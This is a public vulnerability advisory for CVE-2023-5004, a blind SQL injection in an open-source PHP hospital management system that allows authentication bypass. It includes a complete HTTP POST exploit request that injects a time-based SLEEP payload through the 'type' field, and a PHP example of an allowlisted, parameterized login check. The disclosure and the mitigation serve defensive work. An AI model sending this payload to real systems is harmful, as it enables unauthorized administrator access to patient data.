Hospital-management-system-in-php 378c157 - Blind SQL Injection
Summary
Name | Hospital-management-system-in-php 378c157 - Blind SQL Injection
Code name |
Product | Hospital Management System
Affected versions | Version 378c157
State | Public
Release date | 2023-09-28
Vulnerability
Kind | SQL injection
Rule |
Remote | Yes
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3.1 Base Score | 9.8
Exploit available | Yes
CVE ID(s) | CVE-2023-5004
Description
Hospital management system version 378c157 allows an attacker to bypass authentication. This is possible because the application is vulnerable to SQL injection (SQLi).
Vulnerability
A SQL injection (SQLi) vulnerability has been identified in Hospital management system. It allows bypassing authentication and gaining access as any user, in this case the administrator.
Exploit
POST /hospital/hms-staff.php HTTP/1.1
Host: vulnerable.com
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=p77e9snm8g836b5lar3qb6l8ahj
Connection: close

email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-5004 to refer to this issue from now on.
System Information
- Version: hospital-management-system-in-php 378c157
- Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
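The payload in the request above places SQL keywords in the `type` field, which suggests that field reaches the query as a table name, a position that bound parameters cannot protect. The following is an added example of a hardened login check for that case, not code from the project or from the advisory's authors; the function name, table names, column names and the in-memory SQLite database are assumptions made so it runs offline.

```php
<?php
// Added example, not the project's code. Table and column names are assumed.
declare(strict_types=1);

// Allowlist: the client-supplied "type" only selects a key; the table name
// that reaches the SQL text always comes from this constant map.
const ROLE_TABLES = ['admin' => 'admin', 'doctor' => 'doctor'];

function authenticate(PDO $pdo, string $type, string $email, string $password): bool
{
    if (!array_key_exists($type, ROLE_TABLES)) {
        return false; // anything but an exact known role is refused before any query runs
    }
    $table = ROLE_TABLES[$type];
    // Identifiers cannot be bound as parameters, hence the map above;
    // values such as the email are bound, never concatenated.
    $stmt = $pdo->prepare("SELECT password_hash FROM {$table} WHERE email = :email");
    $stmt->execute([':email' => $email]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// Constructed demo data. SQLite is used only so the example runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
foreach (ROLE_TABLES as $table) {
    $pdo->exec("CREATE TABLE {$table} (email TEXT PRIMARY KEY, password_hash TEXT)");
}
$ins = $pdo->prepare('INSERT INTO admin (email, password_hash) VALUES (?, ?)');
$ins->execute(['admin@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The "type" value from the request above, after URL decoding.
$injected = 'admin WHERE 1=1 AND SLEEP(10)-- -';

// Valid login, wrong password, the advisory's "type" value, and a quote
// in the bound email value: only the first call returns true.
var_dump(authenticate($pdo, 'admin', 'admin@example.test', 'correct horse'));
var_dump(authenticate($pdo, 'admin', 'admin@example.test', 'wrong'));
var_dump(authenticate($pdo, $injected, 'username', 'password'));
var_dump(authenticate($pdo, 'admin', "' OR '1'='1", 'password'));
```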
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/projectworldsofficial/hospital-management-system-in-php/
Timeline
2023-09-15: Vulnerability discovered.
2023-09-15: Vendor contacted.
2023-09-28: Public Disclosure.